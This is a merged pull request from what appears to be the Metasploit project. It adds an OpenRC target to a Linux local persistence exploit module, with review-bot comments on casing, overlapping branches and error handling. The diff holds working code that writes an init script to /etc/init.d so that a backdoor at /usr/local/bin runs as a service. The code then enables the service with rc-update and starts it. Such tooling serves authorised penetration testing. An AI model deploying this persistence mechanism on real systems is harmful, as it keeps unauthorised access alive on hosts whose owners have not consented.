Add openrc to exploits/linux/local/service_persistence.rb #19480

Merged
merged 1 commit into from
Oct 2, 2024
46 changes: 46 additions & 0 deletions modules/exploits/linux/local/service_persistence.rb
Expand Up @@ -59,6 +59,11 @@ def initialize(info = {})
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['openrc', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['systemd', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
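Review bot: The new target is named 'openrc' here, while the project spells itself OpenRC (see the URLs cited in the comment at the top of the openrc method) and the neighbouring 'Upstart' target is capitalised. The dispatch in exploit matches on the exact string (when 'openrc'), so choose the casing deliberately and use the same spelling in the target name, the when clause and the 'Utilizing openrc' status message. No documentation change for the new target is visible in this diff; the module's docs should list it alongside the existing targets.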
Expand Down Expand Up @@ -118,6 +123,8 @@ def exploit
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
when 'Upstart'
upstart(path, file, target.opts[:runlevel])
when 'openrc'
openrc(path, file)
when 'systemd'
systemd(path, file)
when 'systemd user'
Expand All @@ -131,6 +138,10 @@ def exploit
print_status('Utilizing Upstart')
upstart(path, file, '2345')
end
if service_system_exists?('openrc')
print_status('Utilizing openrc')
openrc(path, file)
end
has_updatercd = service_system_exists?('update-rc.d')
if has_updatercd || service_system_exists?('chkconfig') # centos 5
print_status('Utilizing System_V')
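Review bot: In the automatic branch the openrc check is a standalone if placed between the Upstart block and the System V check, so the branches are not mutually exclusive. On a host where service_system_exists?('openrc') succeeds and update-rc.d or chkconfig is also present, both openrc(path, file) and the System V handler run, and both work under /etc/init.d, which leaves two service entries from one run. Consider turning these checks into an if/elsif chain, or returning after the first handler succeeds, so that a single run produces one known artifact.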
Expand Down Expand Up @@ -397,4 +408,39 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
cmd_exec("/etc/init.d/#{service_filename} start")
end
end

def openrc(backdoor_path, backdoor_file)
# https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
# https://wiki.alpinelinux.org/wiki/OpenRC
# https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
script = %{#!/sbin/openrc-run
name=#{backdoor_file}
command=/bin/sh
command_args="#{backdoor_path}/#{backdoor_file}"
pidfile="/run/${RC_SVCNAME}.pid"
command_background="yes"
}

service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
service_name = "/etc/init.d/#{service_filename}"
vprint_status("Writing service: #{service_name}")
begin
upload_and_chmodx(service_name, script)
rescue Rex::Post::Meterpreter::RequestError
print_error("Writing '#{service_name}' to the target and or changing the file permissions failed, ensure that directory exists?")
end

if !file_exist?(service_name)
print_error('File not written, check permissions.')
return
end

if datastore['EnableService']
vprint_status('Enabling service')
cmd_exec("rc-update add '#{service_filename}'")
end

vprint_status('Starting service')
cmd_exec("'/etc/init.d/#{service_filename}' start")
end
end
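Review bot: The output of the two cmd_exec calls at the end of openrc (rc-update add and the /etc/init.d start) is discarded, so a failed enable or start looks the same as success; capture the result and print_error when it indicates failure. Smaller points in the same method: datastore['SERVICE'] ? datastore['SERVICE'] : ... treats an empty string as set (it is truthy in Ruby), which would make service_name "/etc/init.d/"; the SERVICE value is interpolated into single-quoted shell commands and backdoor_file is written unquoted into name=, so validate both against a restricted character set first; and the rescue message ("and or changing the file permissions failed, ensure that directory exists?") reads better as a plain statement. The written path is only shown through vprint_status, so at default verbosity there is no record of the file and runlevel entry that need removing afterwards.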